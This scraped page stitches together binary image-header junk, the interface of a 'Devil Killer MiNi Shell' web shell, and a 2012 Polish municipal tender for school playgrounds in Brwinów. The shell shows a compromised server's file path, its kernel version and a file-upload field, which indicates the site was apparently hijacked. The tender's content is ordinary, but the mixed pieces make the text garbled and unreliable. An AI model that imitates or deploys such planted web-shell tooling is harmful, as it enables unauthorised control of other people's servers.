JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120514/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20120514/106013-N-2012.html

<p class="kh_header"><b>Brwinów: Modernizacja szkolnego placu zabaw przy Zespole Szkół w Otrębusach im. Włodzimierza Puchalskiego i utworzenie szkolnego placu zabaw przy Zespole Szkół Nr 1 w Brwinowie im. Tadeusza Kościuszki - w ramach rządowego programu Radosna szkoła.
Część nr 1: Modernizacja szkolnego placu Zabaw przy Zespole Szkół w Otrębusach im. Włodzimierza Puchalskiego, ul. Piaseckiego 2;                                                                  
Część nr 2: Utworzenie szkolnego placu zabaw przy Zespole Szkół Nr 1 w Brwinowie im. Tadeusza Kościuszki, ul. Piłsudskiego 11.</b><br>
<b>Numer ogłoszenia: 106013 - 2012; data zamieszczenia: 14.05.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Brwinów , ul. Grodziska 12, 05-840 Brwinów, woj. mazowieckie, tel. 7382567, faks 7295940.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.brwinow.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Modernizacja szkolnego placu zabaw przy Zespole Szkół w Otrębusach im. Włodzimierza Puchalskiego i utworzenie szkolnego placu zabaw przy Zespole Szkół Nr 1 w Brwinowie im. Tadeusza Kościuszki - w ramach rządowego programu Radosna szkoła.
Część nr 1: Modernizacja szkolnego placu Zabaw przy Zespole Szkół w Otrębusach im. Włodzimierza Puchalskiego, ul. Piaseckiego 2;                                                                  
Część nr 2: Utworzenie szkolnego placu zabaw przy Zespole Szkół Nr 1 w Brwinowie im. Tadeusza Kościuszki, ul. Piłsudskiego 11..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. Zakres rzeczowy przedmiotu zamówienia obejmuje:

CZĘŚĆ NR 1: Modernizacja szkolnego placu zabaw przy Zespole Szkół w Otrębusach im. Włodzimierza Puchalskiego na terenie o pow. ok. 500 m2.
Planowana lokalizacja i opis terenu: Plac położony niedaleko boiska szkolnego, na terenie zadrzewionym. Z jednej strony znajduje się szpaler drzew z drugiej żywopłot. Teren pokryty zachwaszczoną darnią i na ok.. 100 m2 starymi płytami betonowymi
1) Przedmiot zamówienia należy wykonać zgodnie z wytycznymi Ministerstwa Edukacji Narodowej dotyczącymi programu rządowego RADOSNA SZKOŁA.
2) Wykonanie przedmiotu zamówienia zgodnie ze normą PN-EN-1176 i PN-EN-1177.
3) Przygotowanie terenu pod plac zabaw zgodnie ze sztuką budowlaną (wyrównanie terenu, usunięcie zbędnych, korzeni) - zdjęcie warstwy humusu o grubości ok. 30 cm wraz z wywiezieniem oraz  usunięciem ok. 100m2 płyt betonowych wraz z wywiezieniem we wskazane przez Zamawiającego miejsce, które będą kolidować z budowanym placem zabaw. Jednocześnie jeżeli stare urządzenia zabawowe znajdujące się sąsiedztwie budowy będą kolidowały z nowym placem podlegają one demontażowi i złożeniu we wskazane na terenie szkoły miejsce.
4) Przygotowanie terenu pod ułożenie nawierzchni bezpiecznej wraz z niezbędną podbudowa zależną od rodzaju użytej nawierzchni bezpiecznej oraz okrawężnikowanie terenu pod nawierzchnię bezpieczną - zgodnie ze sztuka budowlaną.
5) Położenie nawierzchni bezpiecznej pod nowe urządzenia spełniającej wymogi Polskich Norm gumowej lub piankowej amortyzujących upadek w kolorze pomarańczowym (pow. ok. 240 m2 ) -  połączenie nawierzchni bezpiecznych ścieżką (komunikacja )w kolorze niebieskim typu tartan lub inną nawierzchnia syntetyczną (pow. ok. 50 m2). Nawierzchnie zgodnie z wymaganiami programu RADOSNA SZKOŁA. Resztę terenu zagospodarować trawnikiem - pas zieleni min. 210  m2 oraz obsadzić formowanym żywopłotem z roślin zimozielonych (bez kolców, nietrujących) wokół całego placu zabaw.
6) Zakup, dostawa i montaż urządzeń: 
a) Huśtawka wahadłowa,
b) Huśtawka ważka, 
c) Pająk linowy,
d) Ścianka wspinaczkowa,
e) Poręcze gimnastyczne,
f) Drabinka wysoka,
g) Zestaw drążków do podciągania,
h) Równoważnia typu wiszący mostek,
i) Zestaw 2 wież z min.4 elementami np. mostkiem, pochylnią, przeplotnią, zjeżdżalnią.
7)  2 sztuki ławek z oparciami i wieszakami na odzież lub wieszaki oddzielnie, 2 szt. koszy na śmieci, stojak na rowery. 
8) Regulamin placu zabaw zgodny z wymogami programu RADOSNA SZKOŁA.
9) Urządzenia powinny posiadać dominujący kolor niebieski oraz  spełniać wymogi normy PN-EN-1176 i posiadać stosowne certyfikaty bezpieczeństwa i dopuszczenia do stosowania w kontakcie z dziećmi. 

10) Zgodnie z wytycznymi MEN:
a) sprzęt powinien posiadać co najmniej 3-letni okres gwarancji jakości i rękojmi za wady;
b) urządzenia powinny być wykonane z bezpiecznych i trwałych materiałów oraz spełniać wymogi Polskich Norm i warunków bezpieczeństwa, tj. posiadać stosowne certyfikaty bezpieczeństwa i dopuszczenia do stosowania w kontakcie z dziećmi, wg norm EN-1176 i EN-1177; 
c) urządzenia powinny być wykonane w dominującej ich części z metalu ocynkowanego zabezpieczonego farbami lub stali z elementami z innych materiałów odpornych na warunki atmosferyczne, na stopach stalowych ocynkowanych, zakotwiczone w gruncie poprzez zabetonowanie.
Wytyczne MEN znajdują się pod adresem: http://www.men.gov.pl/index.php?option=com_content&view=section&layout=blog&id=61&Itemid=324

CZĘŚĆ NR 2: Utworzenie szkolnego placu zabaw przy  Zespole Szkół Nr 1 w Brwinowie im. Tadeusza Kościuszki pow. terenu ok. 500m2.
Planowana lokalizacja i opis terenu: plac położony jest między boiskami a bieżnią. Od strony ul. Lipowej rosną pojedyncze drzewa, teren porośnięty trawą na terenie przebadanym i włączonym przez konserwatora pod inwestycje zgodnie z załączona mapka.
1) Przedmiot zamówienia należy wykonać zgodnie z wytycznymi Ministerstwa Edukacji Narodowej dotyczącymi programu rządowego RADOSNA SZKOŁA.
2) Wykonanie przedmiotu zamówienia zgodnie z normą PN-EN-1176 i PN-EN-1177.
3) Przygotowanie terenu pod plac zabaw zgodnie ze sztuką budowlaną (wyrównanie terenu, usunięcie zbędnych, korzeni) - zdjęcie warstwy humusu o grubości ok. 30 cm wraz z wywiezieniem ziemi we wskazane miejsce na terenie Gminy Brwinów
4) Przygotowanie terenu pod ułożenie nawierzchni bezpiecznej wraz z niezbędną podbudowa zależna od rodzaju użytej nawierzchni bezpiecznej oraz okrawężnikowanie terenu pod nawierzchnię bezpieczną - zgodnie ze sztuka budowlaną.
5) Położenie nawierzchni bezpiecznej pod nowe urządzenia spełniającej wymogi Polskich Norm  gumowej lub piankowej  amortyzujących upadek w kolorze pomarańczowym (pow. ok. 240 m2)-  połączenie nawierzchni bezpiecznych ścieżką (komunikacja )w kolorze niebieskim typu tartan lub inną nawierzchnia syntetyczną (pow. ok. 50 m2). Nawierzchnie zgodnie z wymaganiami programu RADOSNA SZKOŁA. Resztę terenu zagospodarować trawnikiem - pas zieleni min. 210 m2 oraz obsadzić formowanym żywopłotem z roślin zimozielonych (bez kolców, nietrujących) wokół całego placu zabaw.
6) Wygrodzić teren ogrodzeniem ażurowym z siatki metalowej w kolorze zielonym wzdłuż granic od strony bieżni. O wysokości 1,5 metra - na całej szerokości placyku.
7) Zakup, dostawa i montaż urządzeń: 
a) Zestaw sprawnościowo-rekreacyjny w skład którego wchodzi min. 4 elementy np. baszta, zjeżdżalnia, drabinki, drążki,
b) Ściana wspinaczkowa,
c) Równoważnia na sprężynach,
d) Huśtawka wahadłowa podwójna, 
e) Huśtawka ważka na sprężynie,
f) Huśtawka ważka na podstawie stabilnej ( metalowej ),
g) Bujak sprężynowiec-koniczynka.
8)  2 sztuki ławek z oparciami i wieszakami na odzież lub wieszaki oddzielnie, 2 szt. koszy na śmieci.
9) Regulamin placu zabaw zgodny z wymogami programu RADOSNA SZKOŁA.
10)Urządzenia powinny posiadać dominujący kolor niebieski oraz  spełniać wymogi normy PN-EN-1176 i posiadać stosowne certyfikaty bezpieczeństwa i dopuszczenia do stosowania w kontakcie z dziećmi. 

11) Zgodnie z wytycznymi MEN:
a) sprzęt powinien posiadać co najmniej 3-letni okres gwarancji jakości i rękojmi za wady;
b) urządzenia powinny być wykonane z bezpiecznych i trwałych materiałów oraz spełniać wymogi Polskich Norm i warunków bezpieczeństwa, tj. posiadać stosowne certyfikaty bezpieczeństwa i dopuszczenia do stosowania w kontakcie z dziećmi,  wg norm EN-1176 i EN-1177;
c) urządzenia powinny być wykonane w dominującej ich części z drewna klejonego wysokiej jakości lub metalu ocynkowanego odpowiednio zabezpieczonego farbami albo stali nierdzewnej z elementami z innych materiałów odpornych na warunki atmosferyczne, na stopach stalowych ocynkowanych, zakotwiczone w gruncie poprzez zabetonowanie.
Wytyczne MEN znajdują się pod adresem: http://www.men.gov.pl/index.php?option=com_content&view=section&layout=blog&id=61&Itemid=324

2. Zamówienie w częściach 1 i 2 obejmuje przygotowanie projektu zagospodarowania terenu na właściwych aktualnych mapach do celów projektowych wraz z niezbędnymi załącznikami celem poprawnego zgłoszenia placów zabaw do Starostwa Powiatowego w Pruszkowie. Zgłoszenia dokonuje Wykonawca - zgodnie z wymaganiami prawa budowlanego w tym zakresie.
3. Place zabaw mają być przeznaczone dla dzieci w młodszym wieku szkolnym i dostosowane do ich potrzeb - zgodnie z wytycznymi programu RADOSNA SZKOŁA.
4. Przy każdym urządzeniu mają być zainstalowane czytelne tablice informacyjne pokazujące możliwości i sposób wykorzystania każdego urządzenia. 
5. Regulamin określający zasady korzystania z placu zabaw musi spełniać wymogi programu RADOSNA SZKOŁA.
6. W celu potwierdzenia, że oferowane roboty i dostawy odpowiadają wymaganiom Zamawiającego Wykonawca załączy do oferty szczegółowy opis elementów wyposażenia placu zabaw wraz z ich kolorystyką (zgodnie z wytycznymi MEN)..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 45.11.27.23-9, 37.53.52.00-9.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 2.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 3.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 1. Każda składana oferta musi być zabezpieczona wadium w wysokości 6.000 zł (słownie: sześć tysięcy złotych), w tym:
1) dla Części 1 - w kwocie 3.000 złotych (słownie: trzy tysiące złotych),
2) dla Części 2 - w kwocie 3.000 złotych (słownie: trzy tysiące złotych).
2. Wadium wnosi się przed upływem terminu składania ofert.
3. Wadium może być wnoszone w następujących formach:
pieniądzu,
1)	poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo-kredytowej, z tym że poręczenie kasy jest zawsze poręczeniem pieniężnym,
2)	gwarancjach bankowych,
3)	gwarancjach ubezpieczeniowych,
4)	poręczeniach udzielanych przez podmioty, o których mowa w art.6 b ust.5 pkt.2 ustawy z dnia 9 listopada 2000r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz. U. Nr 109, poz. 1158 z późn. zm.).
4. Wadium wnoszone w formie pieniężnej należy wnieść przelewem na konto zamawiającego: Nr konta 54 1140 1010 0000 4770 4500 1018.
5. Wadium wnoszone w pozostałych formach prosimy w formie oryginału załączyć do oferty.
1) W przypadku składania przez Wykonawcę wadium w formie gwarancji, gwarancja powinna być sporządzona zgodnie z obowiązującym prawem i winna zawierać następujące elementy: 
a) nazwę dającego zlecenie (Wykonawcy), beneficjenta gwarancji (Zamawiającego), gwaranta (banku lub instytucji ubezpieczeniowej udzielających gwarancji) oraz wskazanie ich siedzib, nr zamówienia nadany przez Zamawiającego, nazwę zamówienia; 
b) określenie wierzytelności, która ma być zabezpieczona gwarancją; 
c) kwotę gwarancji;

d) termin ważności gwarancji (nie może być krótszy niż termin związania Wykonawcy złożoną przez 
niego ofertą); 
e) bezwarunkowe i nieodwołalne zobowiązanie gwaranta do zapłacenia kwoty gwarancji na pierwsze 
pisemne żądanie Zamawiającego zawierające oświadczenie, iż Wykonawca, którego ofertę wybrano: 
-	odmówił podpisania umowy na warunkach określonych w ofercie, lub 
-	nie wniósł zabezpieczenia należytego wykonania umowy, lub 
-	zawarcie umowy stało się niemożliwe z przyczyn leżących po stronie Wykonawcy, lub
-	jeżeli Wykonawca w odpowiedzi na wezwanie, o którym mowa w art.26 ust.3, nie złożył dokumentów lub oświadczeń, o których mowa w art.25 ust.1, lub pełnomocnictw, chyba że udowodni, że wynika to z przyczyn nieleżących po jego stronie.
2) Jeżeli wadium wnoszone jest w formie poręczenia, poręczenie powinno być sporządzone zgodnie z obowiązującym prawem oraz winno zawierać następujące elementy: 
a) nazwę poręczyciela, nazwę wierzyciela (Zamawiający), nazwę dłużnika (Wykonawcy) na rzecz którego udzielane jest poręczenie oraz wskazanie ich siedzib, numer zamówienia nadany przez Zamawiającego, nazwę zamówienia; 
b) określenie wierzytelności, która ma być zabezpieczona poręczeniem; 
c) określenie wysokości wierzytelności objętej poręczeniem; 
d) termin ważności poręczenia (nie może być krótszy niż termin związania Wykonawcy złożoną przez 
niego ofertą); 
e) zobowiązanie poręczyciela do zapłacenia kwoty poręczenia na pisemne żądanie Zamawiającego 
zawierające oświadczenie, iż Wykonawca, którego ofertę wybrano: 
-	odmówił podpisana umowy na warunkach określonych w ofercie,  lub 
-	nie wniósł zabezpieczenia należytego wykonania umowy, lub  
-	zawarcie umowy stało się niemożliwe z przyczyn leżących po stronie Wykonawcy lub
-	jeżeli Wykonawca w odpowiedzi na wezwanie, o którym mowa w art.26 ust.3, nie złożył dokumentów lub oświadczeń, o których mowa w art.25 ust.1, lub pełnomocnictw, chyba że udowodni, że wynika to z przyczyn nieleżących po jego stronie.. 
6. Za skuteczne wniesienie wadium w pieniądzu zamawiający uważa wadium, które w oznaczonym terminie znajdzie się na rachunku bankowym Zamawiającego.
7. Wadium musi obejmować termin związania ofertą.
8. Wykonawca, który nie zabezpieczy oferty wadium zostanie wykluczony z ubiegania się o udzielenie zamówienia publicznego. 
9. Zamawiający zwróci wadium wszystkim Wykonawcom niezwłocznie po wyborze najkorzystniejszej oferty lub unieważnieniu postępowania, z wyjątkiem Wykonawcy, którego oferta została wybrana jako najkorzystniejsza, z zastrzeżeniem pkt.13.
10. Wykonawcy, którego oferta została wybrana jako najkorzystniejsza, zamawiający zwraca wadium niezwłocznie po zawarciu umowy w sprawie zamówienia publicznego.
11. Zamawiający zwróci niezwłocznie wadium, na wniosek wykonawcy, który wycofał ofertę przed upływem terminu składania ofert.
12. Zamawiający zatrzymuje wadium wraz z odsetkami, jeżeli Wykonawca, którego oferta została wybrana:
1)	odmówił podpisania umowy w sprawie zamówienia publicznego na warunkach określonych w ofercie, lub 
2)	nie wniósł zabezpieczenia należytego wykonania umowy, lub
3)	zawarcie umowy w sprawie zamówienia publicznego stało się niemożliwe z przyczyn leżących po stronie Wykonawcy.
13. Zamawiający zatrzymuje wadium wraz z odsetkami, jeżeli Wykonawca w odpowiedzi na wezwanie, o którym mowa w art.26 ust.3, nie złożył dokumentów lub oświadczeń, o których mowa w art.25 ust.1, lub pełnomocnictw, chyba że udowodni, że wynika to z przyczyn nieleżących po jego stronie.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>działalność stanowiąca przedmiot zamówienia nie wymaga posiadania szczególnych uprawnień wynikających z przepisów prawa.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>- w okresie ostatnich 5 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wykonali co najmniej 2 place zabaw o wartości co najmniej 100.000 zł brutto każdy, z załączeniem dokumentu potwierdzającego, że roboty zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone;

1.Ocena sposobu dokonywania spełniania warunków udziału w postępowaniu będzie dokonana wg formuły spełnia/nie spełnia w oparciu o złożone dokumenty. Nie spełnienie w/w warunków skutkować będzie wykluczeniem z postępowania.
2. Wykaz oświadczeń i dokumentów, jakie Wykonawcy mają dostarczyć w celu potwierdzenia spełnienia warunków udziału w postępowaniu:
1) Oświadczenie o spełnianiu warunków udziału w postępowaniu na załączniku nr 2;
2) załącznik nr 3 - wykaz robót budowlanych w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia, wykonanych w okresie ostatnich 5 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz załączeniem dokumentu potwierdzającego, że roboty zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone;
3) Wykonawca może polegać na wiedzy i doświadczeniu, potencjale technicznym, osobach zdolnych do wykonania zamówienia innych podmiotów. W takiej sytuacji Wykonawca jest zobowiązany udowodnić Zamawiającemu, że będzie dysponował zasobami niezbędnymi do realizacji zamówienia, przedstawiając w tym celu pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonywaniu zamówienia.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie określa szczególnych wymagań.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie określa szczególnych wymagań.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie określa szczególnych wymagań.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych w zakresie niezbędnym do wykazania spełniania warunku  wiedzy i doświadczenia, wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz załączeniem dokumentu potwierdzającego, że roboty zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY , USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane dostawy, usługi lub roboty budowlane odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
